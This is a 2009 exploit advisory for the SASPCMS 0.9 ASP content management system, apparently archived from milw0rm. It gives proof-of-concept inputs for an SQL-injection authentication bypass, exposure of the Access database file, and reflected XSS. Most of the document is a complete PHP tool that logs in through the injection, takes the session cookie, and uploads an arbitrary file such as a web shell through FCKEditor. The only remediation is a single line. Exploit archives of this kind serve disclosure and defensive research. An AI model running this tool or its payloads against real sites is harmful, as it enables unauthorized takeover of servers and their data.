##########################www.BugReport.ir######################################## # # AmnPardaz Security Research Team # # Title: SASPCMS Multiple Vulnerabilities # Vendor: http://www.lgasoft.com # Vulnerable Version: 0.9 (prior versions also may be affected) # Exploitation: Remote with browser # Fix: N/A ################################################################################### #################### - Description: #################### SASPCMS is an ASP Content Management System . SASPCMS witch uses MSSQL & Microsoft Access as backend database. #################### - Vulnerability: #################### +-->Authentication Bypass POC: ' or ''=' http://[URL]/saspcms/admin/default.asp +-->Database Information Disclosure POC: http://[URL]/saspcms/db/menu.mdb +-->Cross Site Scripting (XSS). Reflected XSS attack in "default.asp" in "q" parameter. POC: http://[URL]/saspcms/default.asp?q= #################### - PoC: #################### It's possible for remote attackers to upload arbitrary files by using FCKEditor after login to admin area. SASPCMS Remote File Upload

SASPCMS Remote File Upload

hostname (ex:www.sitename.com):     *

path (ex: /saspcms/ or just / ):             *

Please specify a file to upload:            *

specify a port (default is 80):            

Proxy (ip:port):                                 

* fields are required
'; function sendpacket($packet,$response = 0,$output = 0) { $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; global $proxy, $host, $port, $html; if ($proxy == '') { $ock = fsockopen($host,$port); if (!$ock) { $off = 1; echo ' No response from '.htmlentities($host).' ...
'; die; } } else { $parts = explode(':',$proxy); echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; $ock = fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...
'; die; } } if($off == 1) {}else { fputs($ock,$packet); if ($response == 1) { if ($proxy == '') { $html = ''; while (!feof($ock)) { $html .= fgets($ock); } } else { $html = ''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html .= fread($ock,1); } } } else $html = ''; fclose($ock); if ($response == 1 && $output == 1) echo nl2br(htmlentities($html)); } } $host = $_POST['host']; $path = $_POST['path']; $port = $_POST['port']; if (isset($_POST['Submit']) && $host != '' && $path != '') { $port=intval(trim($port)); if ($port=='') {$port=80;} if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {die('Error... check the path!');} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} $host=str_replace("\r\n","",$host); $path=str_replace("\r\n","",$path); // login to the admin area $query = "SAspCms=%27+or+%27%27%3D%27"; $packet = "POST ".$p."admin/admin.asp HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Cache-Control: no-cache\r\n"; $packet .= "Content-Length: ".strlen($query)."\r\n"; $packet .= "Connection: Close\r\n\r\n"; $packet .= $query; sendpacket($packet,1,0); if(stristr($html , 'Set-Cookie: ASPSESSIONID') == true) { $pattern = "(ASPSESSIONID[A-Z]{8}=[A-Z]{24})"; $cookie_name = (preg_match($pattern, $html, $matches)) ? $matches[0] : ''; } // Upload File $content = file_get_contents($_FILES['datafile']['tmp_name']); $name = rand().$_FILES['datafile']['name']; $type = $_FILES['datafile']['type']; $data = "-----------------------------7d51143b10418\r\n"; $data .= "Content-Disposition: form-data; name=\"file\"; filename=\"$name\"\r\n"; $data .= "Content-Type: ".$type."\r\n\r\n"; $data .= "$content\r\n"; $data .= "-----------------------------7d51143b10418--"; $packet = "POST ".$p."wexlite/default.asp?precommand=ProcessUpload&folder=userfiles%5C&popup=true HTTP/1.1\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=---------------------------7d51143b10418\r\n"; $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "Cookie: $cookie_name\r\n"; $packet .= "Cache-Control: no-cache\r\n"; $packet .= "Content-Length: ".strlen($data)."\r\n"; $packet .= "Connection: Close\r\n\r\n"; $packet .= $data; sendpacket($packet,1,0); $packet = "GET ".$p."userfiles/$name HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)\r\n"; $packet .= "Cache-Control: no-cache\r\n"; $packet .= "Connection: Close\r\n\r\n"; sendpacket($packet,1,0); if(stristr($html , '200 OK') != true) {echo "Exploit Faild...";} else echo "Exploit Succeeded...
http://$host:$port$path"."userfiles/$name"; } ?> #################### - Solution: #################### Edit the source code to ensure that inputs are properly sanitized. #################### - Credit: #################### AmnPardaz Security Research & Penetration Testing Group Contact: admin[4t}bugreport{d0t]ir www.BugReport.ir www.AmnPardaz.com # milw0rm.com [2009-04-08]